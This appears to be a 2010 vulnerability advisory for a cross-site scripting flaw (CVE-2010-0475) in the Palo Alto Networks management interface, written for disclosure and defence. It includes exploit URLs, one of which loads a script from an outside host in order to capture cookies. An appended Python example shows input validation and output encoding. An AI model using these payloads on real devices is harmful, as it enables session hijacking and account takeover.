
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Class: Cross-Site Scripting (XSS) Vulnerability
CVE: CVE-2010-0475
Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM
Timeline:
	Submission to MITRE: 1/18/2010
	Vendor Contact: 2/18/2010
	Vendor Response: 2/18/2010
	Patch Available: 5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
	COBIT & ITIL Certified
	President- San Diego Open Web Application Security Project (OWASP)
	Vice President- San Diego Information Audit & Control Association (ISACA)
	SANS Mentor
LinkedIn: www.linkedin.com/in/securityassessment
Blog: www.JeromieJackson.com
Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:
	Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or carry out other nefarious activity.

Exploit:
Single Line working-  https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O">SRC="http://www.jeromiejackson.com/tryme.js">&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution:
A patch will be required from the vendor. It is recommended that a routine to sanitize user input be implemented consistently throughout the application, to mitigate other such occurrences within the application.
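As an added defensive illustration, not part of the advisory or of the vendor's code: the parameter the exploit abuses is reflected into an HTML attribute of the edit-user form, so the mitigation is to validate the account name at the input boundary and to encode it for the attribute context on output. The form template, the allow-list policy, the handler and the sample input below are all constructed assumptions, not PAN-OS markup.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed stand-in for the edit-user form; the real editUser.esp markup
# is not on the advisory, so this template is an assumption.
FORM_TEMPLATE = '<input type="text" name="origusername" value="{user}">'

# Assumed allow-list policy for the account name at the input boundary:
# quotes and angle brackets (the attribute-breaking characters) are
# rejected outright rather than "cleaned" out of the value.
USERNAME_RE = re.compile(r'[A-Za-z0-9_.\-]{1,64}')


def validate_username(value: str) -> bool:
    """Input-boundary check: accept only allow-listed account names."""
    return USERNAME_RE.fullmatch(value) is not None


def render_vulnerable(user: str) -> str:
    """Reflects the parameter unencoded: the pattern the advisory describes."""
    return FORM_TEMPLATE.format(user=user)


def render_fixed(user: str) -> str:
    """Encodes the value for the HTML-attribute context before reflecting it."""
    return FORM_TEMPLATE.format(user=html.escape(user, quote=True))


def attribute_intact(rendered: str) -> bool:
    """True when the fragment is still one input element whose value
    attribute was not broken out of (no stray tags or extra attributes)."""
    pattern = r'<input type="text" name="origusername" value="[^"<>]*">'
    return re.fullmatch(pattern, rendered) is not None


def handle_edit_user(query_string: str) -> str:
    """Hypothetical request handler: decode the query string as the server
    would, validate on input, encode on output. Returns the rendered
    fragment, or a rejection marker for a disallowed account name."""
    params = parse_qs(query_string, keep_blank_values=True)
    user = params.get("origusername", [""])[0]
    if not validate_username(user):
        return "400 rejected"
    return render_fixed(user)


# Constructed attribute-breakout input using a harmless marker element.
CONSTRUCTED_INPUT = 'test"><b>marker</b>'
```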

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

